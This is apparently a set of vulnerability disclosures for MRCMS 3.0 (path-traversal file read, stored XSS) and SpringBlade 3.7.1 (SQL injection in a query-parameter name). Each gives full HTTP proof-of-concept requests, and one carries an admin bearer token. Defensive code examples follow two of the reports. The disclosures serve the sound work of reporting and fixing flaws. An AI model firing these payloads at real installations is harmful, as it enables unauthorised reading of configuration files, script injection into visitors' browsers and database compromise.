cve's Issues
MRCMS 3.0 Arbitrary file reading vulnerability exists /admin/file/edit.do
Build the source code locally by downloading https://gitee.com/marker/MRCMS
The vulnerability exists: http://127.0.0.1:8080/admin/index.do
Click Content Management-->File Management
Click the Edit File button 1.txt
Read the config.properties file in the resources directory by using ../
poc
GET /admin/file/edit.do?path=../resources/config.properties&name= HTTP/1.1
Host: 127.0.0.1:8080
Referer: http://127.0.0.1:8080/admin/index.do
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: cors
X-Requested-With: XMLHttpRequest
Read the contents of the config.properties file
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
Pass in the path and name variables in the code, obtain the file path through the File class, and finally use FileTools.getFileContet() to read the content of the obtained file.
    @RequestMapping("/edit")
    public ModelAndView edit(@RequestParam("path") String path, @RequestParam("name") String name){
        ModelAndView view = new ModelAndView(this.viewPath + "edit");
        // path and name come from the request and are appended to the web root as-is
        File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
        try {
            view.addObject("data", FileTools.getFileContet(file, FileTools.FILE_CHARACTER_UTF8));
        } catch (IOException e) {
            e.printStackTrace();
        }
        view.addObject("path", encoding(path));
        view.addObject("name", encoding(name));
        return view;
    }
Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
The getFileContet method calls getContent
    public static final String getFileContet(File filePath,String character) throws IOException{
        return FileTools.getContent(filePath, character);
    }
Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
getContent reads the file contents
    private static String getContent(File filePath, String character) throws IOException{
        FileInputStream __fis = new FileInputStream(filePath); // file byte stream
        return getStreamContent(__fis, character); // return the file contents
    }
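The edit handler above builds the File from request input without checking where the result points. The following is an added example, not MRCMS code, of a containment check that could sit in front of such a read; the class name, method name and temporary directory layout are hypothetical and constructed for the demonstration.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeFileResolver {
    // Resolves path/name under baseDir and rejects anything that ends up outside it.
    static Path resolveInside(Path baseDir, String path, String name) throws IOException {
        Path base = baseDir.toRealPath();
        // normalize() collapses "../" segments before the containment check
        Path candidate = base.resolve(path).resolve(name).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes base directory");
        }
        // toRealPath() follows symlinks, so a link pointing outside base is caught too
        Path real = candidate.toRealPath();
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new SecurityException("not a regular file inside base directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout mirroring the report: <tmp>/webroot/1.txt and
        // <tmp>/resources/config.properties (sample content, not real data).
        Path root = Files.createTempDirectory("traversal-demo");
        Path webroot = Files.createDirectories(root.resolve("webroot"));
        Path resources = Files.createDirectories(root.resolve("resources"));
        Files.write(webroot.resolve("1.txt"), "hello".getBytes(StandardCharsets.UTF_8));
        Files.write(resources.resolve("config.properties"),
                "sample=constructed".getBytes(StandardCharsets.UTF_8));

        Path ok = resolveInside(webroot, "", "1.txt");
        System.out.println("allowed: " + new String(Files.readAllBytes(ok), StandardCharsets.UTF_8));

        try {
            resolveInside(webroot, "../resources/config.properties", "");
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Path.startsWith compares whole path elements, so a sibling directory whose name merely begins with the base directory's name does not pass the check.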
MRCMS 3.0 There is an xss cross-site scripting vulnerability /admin/system/saveinfo.do
Build the source code locally by downloading https://gitee.com/marker/MRCMS
The vulnerability exists: http://127.0.0.1:8080/admin/index.do
Insert xss cross-site scripting attack code
"><img src=1 onerror=alert(/xss/)>
POC:
POST /admin/system/saveinfo.do HTTP/1.1
Host: 127.0.0.1:8080
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8080/admin/index.do
Origin: http://127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Sec-Fetch-Mode: cors
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 844
config.title=蘑菇建站系统&config.url=http://cms.yl-blog.com/&config.keywords=蘑菇建站系统&config.description=蘑菇建站系统"><img src=1 onerror=alert(/xss/)>&[email protected]&config.mobile=&config.qq=&config.copyright=版权所有©蘑菇建站系统&config.icp=蜀ICP备09035816号-2&config.defaultlang=zh-CN&config.statistics=true&config.index_page=index&config.error_page=error.html&config.themes_active=flatweb&config.themes_cache=temp/&config.dev_mode=true&config.gzip=true&config.compress=false&config.statichtml=false&config.filePath=&config.themesPath=&config.loginSafe=&config.tongjiScirpt=
Visit http://127.0.0.1:8080/about/us.html to trigger xss payload
SpringBlade 3.7.1 /api/blade-system/tenant There is an injection vulnerability in sql
Build the source code locally by downloading https://gitee.com/smallc/SpringBlade
The vulnerability exists: http://127.0.0.1/api/blade-system/tenant/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1
poc
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Host: 127.0.0.1
Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ
Read the current database user
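In the request above the SQL expression sits in the query-string parameter name, not in its value. The following is an added example, not SpringBlade code, of building a filter clause so that identifiers come only from a fixed map and values are bound as parameters; the class, the accepted keys, the column names and the table name are hypothetical.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

public class TenantQueryBuilder {
    // Hypothetical mapping: accepted request key -> fixed column name.
    static final Map<String, String> COLUMNS = Map.of(
            "tenantId", "tenant_id",
            "tenantName", "tenant_name");

    // Builds a WHERE clause whose identifiers come only from COLUMNS and
    // whose values are left as bind placeholders collected in args.
    static String buildWhere(Map<String, String> params, List<Object> args) {
        StringBuilder where = new StringBuilder();
        for (Map.Entry<String, String> p : params.entrySet()) {
            String column = COLUMNS.get(p.getKey());
            if (column == null) {
                // The request key never reaches the SQL text.
                throw new IllegalArgumentException("unexpected query parameter: " + p.getKey());
            }
            where.append(where.length() == 0 ? " WHERE " : " AND ")
                 .append(column).append(" = ?");
            args.add(p.getValue());
        }
        return where.toString();
    }

    public static void main(String[] args) {
        // Constructed inputs: one ordinary filter, then the key from the request above.
        Map<String, String> ok = new LinkedHashMap<>();
        ok.put("tenantName", "acme");
        List<Object> binds = new ArrayList<>();
        // "tenant" is a placeholder table name for the demonstration.
        System.out.println("SELECT * FROM tenant" + buildWhere(ok, binds) + " binds=" + binds);

        Map<String, String> bad = new LinkedHashMap<>();
        bad.put("updatexml(1,concat(0x7e,user(),0x7e),1)", "1");
        try {
            buildWhere(bad, new ArrayList<>());
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```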